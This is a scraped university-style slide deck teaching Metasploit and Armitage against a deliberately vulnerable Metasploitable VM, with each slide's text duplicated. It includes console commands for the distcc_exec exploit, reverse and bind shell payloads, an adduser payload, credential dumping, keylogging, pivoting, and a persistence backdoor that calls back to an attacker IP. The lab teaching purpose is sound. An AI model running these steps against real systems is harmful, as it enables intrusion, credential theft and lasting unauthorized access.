Metasploit a short tutorial Thanks to Jos Wetzels

  • Slides: 68
Download presentation
Metasploit a short tutorial Thanks to Jos Wetzels & Wouter Bokslag

Metasploit a short tutorial Thanks to Jos Wetzels & Wouter Bokslag

STATUS OF THESE SLIDES • Status: third version, improved and extended tutorial which includes

STATUS OF THESE SLIDES • Status: third version, improved and extended tutorial which includes use of vmware. • Additional slides not included in the program for the moment • Additional slides need to be polished. • Backrtrack Linux has been replaced by Kali linux (www. kali. org). - The slides have not been updated yet • Armitage / name of department 4 -12 -2020 PAGE 1

Let’s start - TBCHANGED • Students are supposed to install metasploit on their computer.

Let’s start - TBCHANGED • Students are supposed to install metasploit on their computer. • The slides we make here are done using - Kali lunux and armitage on the attacking side − http: //www. kali. org/ - Metasploitable on the attacked side. − Metasploitable is a linux distribution full of bugged services, that can be used to practice metasploit attacking skills. − See: http: //www. offensive-security. com/metasploit-unleashed/Metasploitable − BTW: the last link is a beautiful site/tutorial on the use of linux. • We start with an exercise and then we get into the explanation • This exercise is *obligatory* / name of department 4 -12 -2020 PAGE 2

Setup • Warning: much more than like running webgoat, running metasploitable makes you vulnerable

Setup • Warning: much more than like running webgoat, running metasploitable makes you vulnerable also to external attacks. • Be ready to be hacked. • So, if you run it on your usual computer using vmware, use the network configuration “host only” - This will make sure you cannot be hacked from oustide. • Setup I use for this small tutorial (and for most of what I do) - Mac + 2 virtual machines (one with kali 2. 0, the other one with metasploitable) • You can download / name of department 4 -12 -2020 PAGE 3

(OLD) Instructions for Windows • Instructions for Windows are probably the following (they are

(OLD) Instructions for Windows • Instructions for Windows are probably the following (they are old, and if they are not correct, find the solution yourself, ok? Real hackers are not stopped by silly details): Download Metasploit it should comes with ARMITAGE and NMap built-in. Download VMWare Player (It’s free) Download Metasploitable Open Metasploitable in VMWare Player and run it Log in with msfadmin: msfadmin Get root using sudo su with password msfadmin Check if network connection is up & running using ifconfig/ping, else use dhclient. Note down Metasploitable IP. - Start ARMITAGE (Start -> All Programs -> Metasploit Framework -> ARMITAGE) - or: root@kali: ~# armitage & - / name of department 4 -12 -2020 PAGE 4

Instructions for Linux/vmware • • Install Kali and Metasploitable in two different virtual machines

Instructions for Linux/vmware • • Install Kali and Metasploitable in two different virtual machines Make sure they are connected with the “host only” system Change the root password. Use the following command (regularly) to make sure you have the last version installed • # apt-get update && apt-get upgrade - Meaning “type apt-get update && apt-get upgrade ” / name of department 4 -12 -2020 PAGE 5

Warning • • Some of these slides are written from the Windows perspective. Some

Warning • • Some of these slides are written from the Windows perspective. Some others are written using Backtrack. Corrections to the slides are more than welcome. Again, you are expected to sort mismatches yourself. / name of department 4 -12 -2020 PAGE 6

Starting up BT with Kali • # startx (check if needed) - do this

Starting up BT with Kali • # startx (check if needed) - do this only if the x-windows system doesn’t start on its own. • Open a terminal window • # service postgresql start (check if needed) - may require: - # /etc/init. d/postgresql start • • #service metasploit start (on Kali 1) #msfdb (on Kali 2) #armitage That will try to connect to metasploit RPC server: click “connect” • If Metasploit is not running it will kindly ask you if it should start it for you. Click “yes” and be / name of department 4 -12 -2020 PAGE 7

Oops • Depending on the network configuration you could get an error message: •

Oops • Depending on the network configuration you could get an error message: • In this case…. • #ifconfig eth 1 Link encap: Ethernet HWaddr 00: 0 c: 29: b 8: b 6: 58 inet addr: 192. 168. 232. 129 Bcast: 192. 168. 232. 255 Mask: 255. 0 / name of department 4 -12 -2020 PAGE 8

Using ARMITAGE (the interface to Metasploit) The juicy interface Armitage = Metasploit ++ Metasploit

Using ARMITAGE (the interface to Metasploit) The juicy interface Armitage = Metasploit ++ Metasploit console / name of department 4 -12 -2020 PAGE 9

Hosts I’ve already “added” we see in a minute how to do this The

Hosts I’ve already “added” we see in a minute how to do this The console / name of department 4 -12 -2020 PAGE 10

To find out the “local” hosts • With ifconfig you know what is the

To find out the “local” hosts • With ifconfig you know what is the IP address of your (virtual) machine. • You need to scan the network for the other ones. - To add the hosts (one of the many ways) you can use nmap directly from Armitage - Hosts > Nmap Scan > Quick Scan (OS Detect) • You don’t want nmap to scan the whole network, so it is better if you have an idea which addresses you are looking for. / name of department 4 -12 -2020 PAGE 11

About Scanning • You can initiate NMap scan through Hosts -> NMap Scan ->

About Scanning • You can initiate NMap scan through Hosts -> NMap Scan -> Intense Scan, All TCP Ports - But watch out: this is a very heavyweight scan. System administrators are going to see it happening. And they'll ask you questions. • Initiate Auxiliary scan through Hosts -> MSF Scans - Wait until both scans complete (MSF Scan will notify you with a message box, NMap scan tab will say so) • See what ports are open and what services they are running by right clicking the target -> Services / name of department 4 -12 -2020 PAGE 12

If the scanning went well…. • You get an inviting-looking message, and now the

If the scanning went well…. • You get an inviting-looking message, and now the target computer(s) is on your radar / name of department 4 -12 -2020 PAGE 13

Now you need to get in…. • You can use “login” if you have

Now you need to get in…. • You can use “login” if you have a legitimate log in to the target system. (assume we don’t) • Your goal is to find vulnerable services • You can go for a deeper scan • Right-click “scan”. • And then …. / name of department 4 -12 -2020 PAGE 14

Gathering information • You have discovered the operating system (see the penguin) • Now

Gathering information • You have discovered the operating system (see the penguin) • Now right-click “services” / name of department 4 -12 -2020 PAGE 15

Finally • > Attacks > Find Attacks …. / name of department 4 -12

Finally • > Attacks > Find Attacks …. / name of department 4 -12 -2020 PAGE 16

Finding the right attack • Right click > Attack > ftp: you get to

Finding the right attack • Right click > Attack > ftp: you get to see 5 (in this case) exploits on (known vulnerabilities of) the ftp service that are known by Metasploit and that you *might* be able to use to attack the target. • There is no guarantee that the target actually is actually vulnerable to any of them. • So which one should you use? • The hard way is to look at the features of the attacks one by one (more on how to do this later) and see if they match the target. The easy way is to use the “check” function. NB: not all exploit can be “checked” • Let’s try it… / name of department 4 -12 -2020 PAGE 17

Some tries…. / name of department 4 -12 -2020 PAGE 18

Some tries…. / name of department 4 -12 -2020 PAGE 18

So far, little luck • If we check the ftp exploit, we get only

So far, little luck • If we check the ftp exploit, we get only two types of results: • [*] This exploit does not support check - The target might be exploitable, but you don’t know, OR • [*] The target is not exploitable - Meaning the target does not contain the vulnerability needed by the exploit. Perhaps it has been patched, or it uses sw that does not match the exploit. • So? We try other attacks. • For instance: - Attack > misc > distcc_exec, - Exploiting service distccd / name of department 4 -12 -2020 PAGE 19

Bingo! • So this is something we can and will use. • To do

Bingo! • So this is something we can and will use. • To do so, we’d better first learn how to use the MSF console. - Which is the leftmost tab in the lower part of the screen / name of department 4 -12 -2020 PAGE 20

Exploitation, the graphical way… • Find suitable attack suggestions (as opposed to manually identifying

Exploitation, the graphical way… • Find suitable attack suggestions (as opposed to manually identifying them) - Attacks -> Find Attacks - • When message box notifies you attacks have been found, ‘Attack’ menu is added to host rightclick-menu. • Find vulnerable services by rightclick - target -> Attack -> ‘Service name’ -> Check Exploits - This will open a tab which runs ‘check’ method for each possible exploit, Press CTRL+F and search for vulnerable. - Some exploit modules do not support `check` method, try these manually or check their descriptions. You can also search manually in the left-hand menu under ‘exploits’. / name of department 4 -12 -2020 PAGE 21

But old pros like you use the MSF Console • It is the only

But old pros like you use the MSF Console • It is the only supported way to access most of the features within Metasploit • Provides a console-based interface to the framework • Contains the most features and is the most stable MSF interface • Full readline support, tabbing, and command completion • Execution of external commands in msfconsole is possible / name of department 4 -12 -2020 PAGE 22

Some of the commands While using MSFConsole other commands become available: Check -> check

Some of the commands While using MSFConsole other commands become available: Check -> check if target is vulnerable to selected exploit (not always supported) Exploit -> Run exploit with set configuration Run -> Run auxiliary with set configuration / name of department 4 -12 -2020 PAGE 23

Command-line Search • We know that our target is attackable via the distcc_exec exploit

Command-line Search • We know that our target is attackable via the distcc_exec exploit • We now want to build the attack from the console • First we need to find the exploit (this *does* work in KALI) • Type `search distcc • You might have to be patient waiting for the answer / name of department 4 -12 -2020 PAGE 24

Note • Here you see as result exploit/unix/misc/distcc_exec , • but on your release

Note • Here you see as result exploit/unix/misc/distcc_exec , • but on your release the directory may vary. • Now you want to know more about this exploit. • So you invoke: info exploit/unix/misc/distcc_exec / name of department 4 -12 -2020 PAGE 25

+ references (not included in screenshot) / name of department 4 -12 -2020 PAGE

+ references (not included in screenshot) / name of department 4 -12 -2020 PAGE 26

Options • As you can see there are two basic options: - RHOST ->

Options • As you can see there are two basic options: - RHOST -> Contains the target address - RPORT -> Contains the target port TBD: check th automatic targ • The info also notifies you that the maximum payload space is 1024 bytes and targeting is done automatically (instead of having to select one depending on target host details) - We’ll get back to this payload thing in a second. • Type `use exploit/unix/misc/distcc_exec` to use the exploit - You enter in “exploitation mode” • Type `help` to view the exploit commands / name of department 4 -12 -2020 PAGE 27

Exploit Commands • So: what can we do with this exploit? • In itself,

Exploit Commands • So: what can we do with this exploit? • In itself, it simply sets the first step in a (e. g. ) buffer overflow. • And what can we do as second step? - Meet the payload…. / name of department 4 -12 -2020 PAGE 28

The carrier and the payload • distt_exec is basically a “carrier”, that can probably

The carrier and the payload • distt_exec is basically a “carrier”, that can probably carry many different kind of payloads. Our goal is to get full control of the target machine, so let’s see if we can do this using this carrier. / name of department 4 -12 -2020 PAGE 29

Let’s choose a Payload • We know we have 1024 bytes of payload space

Let’s choose a Payload • We know we have 1024 bytes of payload space (which is enough for a lot of purposes). Let’s see what you can do with it, type - show targets (here not needed because it is an “automatic target exploit) - show payloads (next slide) / name of department 4 -12 -2020 PAGE 30

Show Payloads A shell is what you want to get. Bind TCP: a shell

Show Payloads A shell is what you want to get. Bind TCP: a shell on the target machine, which listens to a given port. Reverse TCP: a shell on the target machine, which connects back to the attacking one (bye firewall… no problem with NAT translations etc ) Two years ago there were half as many payloads…. Type ‘info cmd/unix/bind_perl` to display information about this payload / name of department 4 -12 -2020 PAGE 31

Info on bind_perl / name of department 4 -12 -2020 PAGE 32

Info on bind_perl / name of department 4 -12 -2020 PAGE 32

Set payload; show options Options of the exploit Options of the specific payload /

Set payload; show options Options of the exploit Options of the specific payload / name of department 4 -12 -2020 PAGE 33

Going on…. • Type `set RHOST 192. 168. 232. 128` to select our target

Going on…. • Type `set RHOST 192. 168. 232. 128` to select our target • Since our RPORT is already set correctly and RHOST isn’t necessary for the payload we won’t set those • Our bindshell will listen on port 12467 (? ? , in other images) if it is executed successfully, keep in mind this port has to be free and preferably above 1024 (since most services don’t run as root – and only root can listen to ports below 1024) • For some exploits, we can type `check` to see if the target is vulnerable, we won’t do it for this one though • Type `show evasion` to show evasion methods (we will not select any) • Now type `exploit` to exploit our target / name of department 4 -12 -2020 PAGE 34

Alternative way to set LPORT, etc … • Set LHOST to the IP of

Alternative way to set LPORT, etc … • Set LHOST to the IP of the attacking machine (if you’re not using a pivot, this is your own IP) • Let LPORT be whatever it is • Set RHOST to be the IP of the target machine • Set RPORT to be the port of the vulnerable service (in this case 3632 of distccd) • Click Launch / name of department 4 -12 -2020 PAGE 35

BINGO!!! Notice how armitage tells you that the target has been compromised. Now we

BINGO!!! Notice how armitage tells you that the target has been compromised. Now we can do basically anything on it. / name of department 4 -12 -2020 PAGE 36

Graphical Notation / name of department 4 -12 -2020 PAGE 37

Graphical Notation / name of department 4 -12 -2020 PAGE 37

Did you succeed? • If you are successful, the target machine icon will be

Did you succeed? • If you are successful, the target machine icon will be red with electric jolts and the console tab will notify you have a shell. A menu option for the shell will be added to the rightclick menu of the target. • NOTE: For Unix targets a shell is the default payload, for Windows targets a meterpreter session is the default payload. These can be modified through working from the console tab and using MSFConsole instead of the GUI. Results are added to the GUI though. • Interact with Shell 1, you now have compromised the target machine. / name of department 4 -12 -2020 PAGE 38

Meterpreter? (1) • Typically, you want to have a shell on the target system

Meterpreter? (1) • Typically, you want to have a shell on the target system - So the payload executes a command interpreter - Like /bin/sh/ • This approach, however, has disadvantages: (think about it a sec) - Easily detectable: − The execution of a program involves the creation of a process, which can be detected by a host-based intrusion detection system (whitelisting) - Chroot problem. − If the application you exploit is chrooted, then it is impossible for it (and thus for your payload) to refer to objects outside the chrooted environment. So you can't call the /bin/sh altogether (there appear to be ways out of this, but if you are at that level you should not sit in this class) - Limitation of the command interpreter − which may have access to a limited set of commands / name of department 4 -12 -2020 PAGE 39

Meterpreter! (2) • The meterpreter is a meta-interpreter that runs within the exploited application.

Meterpreter! (2) • The meterpreter is a meta-interpreter that runs within the exploited application. • Evades the problems we mentioned so far - NOT Easily detectable. − The meterpreter does not need to start a new process. Also, the meterpreter extensions, and the meterpreter server itself, are all executed entirely from memory (technique called Remote Library Injection) − In some cases the injected application keeps on running. - DOES NOT HAVE A Chroot problem. − It executes all commands within the exploited application, so it doesn't have to access other resources (which would be difficult in the case of a chrooted application) - DOES NOT SUFFER Limitations of the command interpreter, − actually you can write your own command extensions as long as they can be compiled into a DLL. • / name of department 4 -12 -2020 PAGE 40

For intstance • We can start a shell • Notice the extra menu item

For intstance • We can start a shell • Notice the extra menu item “Shell 1” that has appeared when you right click. • Click “interact”, and what you get is / name of department 4 -12 -2020 PAGE 41

A shell on the target machine • It appears as new tab in the

A shell on the target machine • It appears as new tab in the bottom window. / name of department 4 -12 -2020 PAGE 42

You upload some files • Use: • Try it on a custom file •

You upload some files • Use: • Try it on a custom file • Then go to your console, type “ls” and notice that the file has been uploaded. • It could be an executable, of course. / name of department 4 -12 -2020 PAGE 43

You can pass the session to yourself or someone else. • Once you exploit

You can pass the session to yourself or someone else. • Once you exploit a host, duplicating your access should be a first priority. Meterpreter N -> Access > Pass Session will inject meterpreter into memory and execute it for you. By default this option is configured to call back to Armitage's default Meterpreter listener. Just click Launch. • You may also use Pass Session to send meterpreter to a friend. Set LPORT and LHOST to the values of their Meterpreter multi/handler. • If your friend uses Armitage, have them type set in a Console tab and report the LHOST and LPORT values to you. These are the values for their default Meterpreter listener. • So if you launch on Pass Session, you’ll get a second shell / name of department http: //www. fastandeasyhacking. com/manual 4 -12 -2020 PAGE 44

Post-exploitation modules • Now you are in, you have control of the target, but

Post-exploitation modules • Now you are in, you have control of the target, but you want to carry out specific tasks, like keylogging. • You can use one of the many ready post exploitation modules. • Exercise: try some of these exploitation modules. / name of department 4 -12 -2020 PAGE 45

For instance • Post-module firefox_creds… / name of department 4 -12 -2020 PAGE 46

For instance • Post-module firefox_creds… / name of department 4 -12 -2020 PAGE 46

Payload Usage in Armitage • ARMITAGE has static payloads - (Shell for Unix target,

Payload Usage in Armitage • ARMITAGE has static payloads - (Shell for Unix target, Meterpreter for Windows target) - but supports MSFConsole in a tab. • Great use of payloads in ARMITAGE: Generating payload executables • Let’s generate Payload ELF. / name of department 4 -12 -2020 PAGE 47

Take a look at "adduser” (1/3) • Either use left-hand menu, or / name

Take a look at "adduser” (1/3) • Either use left-hand menu, or / name of department 4 -12 -2020 PAGE 48

Take a look at "adduser” (2/3) • but old pros like you use the

Take a look at "adduser” (2/3) • but old pros like you use the MSFConsole. - > use payload/linux/x 86/adduser − (note: requires root shell!) - > set USER metasploit - > set PASS metasploit - > generate –t elf –f C: \dir\naughtyelf (don’t use double-quotes) / name of department 4 -12 -2020 PAGE 49

Take a look at "adduser” (3/3) • And now you can upload it…. •

Take a look at "adduser” (3/3) • And now you can upload it…. • Rightclick target -> Shell 1 -> Upload -> Select naughtyelf • Rightclick target -> Shell 1 -> Interact - $ chmod +x. /naughtyelf - $ cat /etc/passwd (and verify a new user named metasploit is added) / name of department 4 -12 -2020 PAGE 50

LET’S RECAPITULATE / name of department 4 -12 -2020 PAGE 51

LET’S RECAPITULATE / name of department 4 -12 -2020 PAGE 51

Metasploit: a framework for penetration testing and exploitation • Metasploit is an open source

Metasploit: a framework for penetration testing and exploitation • Metasploit is an open source / name of department 4 -12 -2020 PAGE 52

Metasploit Architecture • • TOOLS PLUGINS LIBRARY MODULES - Exploits Payloads Encoders Nops Auxiliary

Metasploit Architecture • • TOOLS PLUGINS LIBRARY MODULES - Exploits Payloads Encoders Nops Auxiliary / name of department 4 -12 -2020 PAGE 53

Exploits • For a single vulnerability for a set of targets • Active exploits

Exploits • For a single vulnerability for a set of targets • Active exploits (attack a specific host) • Passive exploits; wait for a connection and try to exploit the connecting application (e. g. the web browser) / name of department 4 -12 -2020 PAGE 54

Payloads • Generate stand-alone shellcode or can be selected for use in exploits •

Payloads • Generate stand-alone shellcode or can be selected for use in exploits • Three types - Inline/Single. − Standalone, self-contained shellcode (Eg. Adding a user to a system) - Stager. − Sets up network connection between victim and attacker (Eg. Bindshells, reverse connect shell, etc. ) - Stages. − Payload components downloaded by Stager module, provide advanced features with no size limit (Eg. Meterpreter, VNC injection, etc. ) / name of department 4 -12 -2020 PAGE 55

Encoders • • Encoders encode a payload and prefix a decoder to evade detection

Encoders • • Encoders encode a payload and prefix a decoder to evade detection Must not touch certain registers Must be under a max size Must avoid bad characters (NULL bytes, newlines, etc. ) - We'll get back to this when we describe how to write your own module. • Can generate alphanumeric shellcode − (ASCII-printable shellcode) / name of department 4 -12 -2020 PAGE 56

And now: Armitage / name of department 4 -12 -2020 PAGE 57

And now: Armitage / name of department 4 -12 -2020 PAGE 57

ADDITIONAL SLIDES TO BE INCLUDED (ONE DAY) / name of department 4 -12 -2020

ADDITIONAL SLIDES TO BE INCLUDED (ONE DAY) / name of department 4 -12 -2020 PAGE 58

Meterpreter in Armitage • Assume we have exploited a Windows machine and have a

Meterpreter in Armitage • Assume we have exploited a Windows machine and have a running Meterpreter session. • This can be achieved without exploitation through the left-hand menu -> Payloads -> Windows -> Meterpreter -> bind_tcp and generating a EXE file containing the meterpreter payload. • After running it on the target machine, go to ARMITAGE -> Listeners -> Bind and connect to the port of the Meterpreter session to compromise the target machine • Can be used to browser files, list processes, run VNC session, make screenshots, etc. / name of department 4 -12 -2020 PAGE 59

/ name of department 4 -12 -2020 PAGE 60

/ name of department 4 -12 -2020 PAGE 60

System Access & Escalation • Meterpreter -> Access -> Escalate Privileges to get highest

System Access & Escalation • Meterpreter -> Access -> Escalate Privileges to get highest possible privileges (potentially SYSTEM) • Meterpreter -> Access -> Dump Hashes to dump System hashes, view -> Credentials to view them. These can be used in `Pass the hash` attack or cracked using Cain or John The Ripper • Meterpreter -> Access -> Migrate Now migrates the Meterpreter session to a new process • Meterpreter -> Explore -> Key Scan Initiates a keylogger on the target machine, logging all pressed keys. / name of department 4 -12 -2020 PAGE 61

ARP Scan − Meterpreter -> ARP Scan − ARP Scanning finds hosts on the

ARP Scan − Meterpreter -> ARP Scan − ARP Scanning finds hosts on the same network as the compromised host − Pick the subnet you’re interested in and click ARP Scan, this adds hosts in the same subnet to your ARMITAGE target list / name of department 4 -12 -2020 PAGE 62

Pivoting − − − / name of department Pivoting is routing your metasploit attacks

Pivoting − − − / name of department Pivoting is routing your metasploit attacks through a compromised host In order to setup pivoting rightclick the target -> Meterpreter -> Pivot -> Setup Select the subnet you want to pivot through the session Once setup, green lines will be drawn between the host and all reachable targets The line will become bright green when the pivot is in use To use a pivot host for a reverse connection, set the LHOST variable in the exploit launch dialog to the IP address of the pivot host. 4 -12 -2020 PAGE 63

/ name of department 4 -12 -2020 PAGE 64

/ name of department 4 -12 -2020 PAGE 64

Maintaining access using persistence • Meterpreter console -> run persistence –U –I 5 –p

Maintaining access using persistence • Meterpreter console -> run persistence –U –I 5 –p 1337 –r 10. 0. 0. 11 • Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a meterpreter connection will be spawned. / name of department 4 -12 -2020 PAGE 65

Other way to maintain access • Creating a persistent meterpreter backdoor service (METSVC) allows

Other way to maintain access • Creating a persistent meterpreter backdoor service (METSVC) allows us to maintain access • right click target -> Meterpreter -> Access -> Persist • Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a meterpreter connection will be spawned. / name of department 4 -12 -2020 PAGE 66

Handy Commands • ifconfig: to see which interfaces are open • lsof (list of

Handy Commands • ifconfig: to see which interfaces are open • lsof (list of open files, tipico: lsof -i –P) to see which programs are listening to which ports (in unix, sockets are files). / name of department 4 -12 -2020 PAGE 67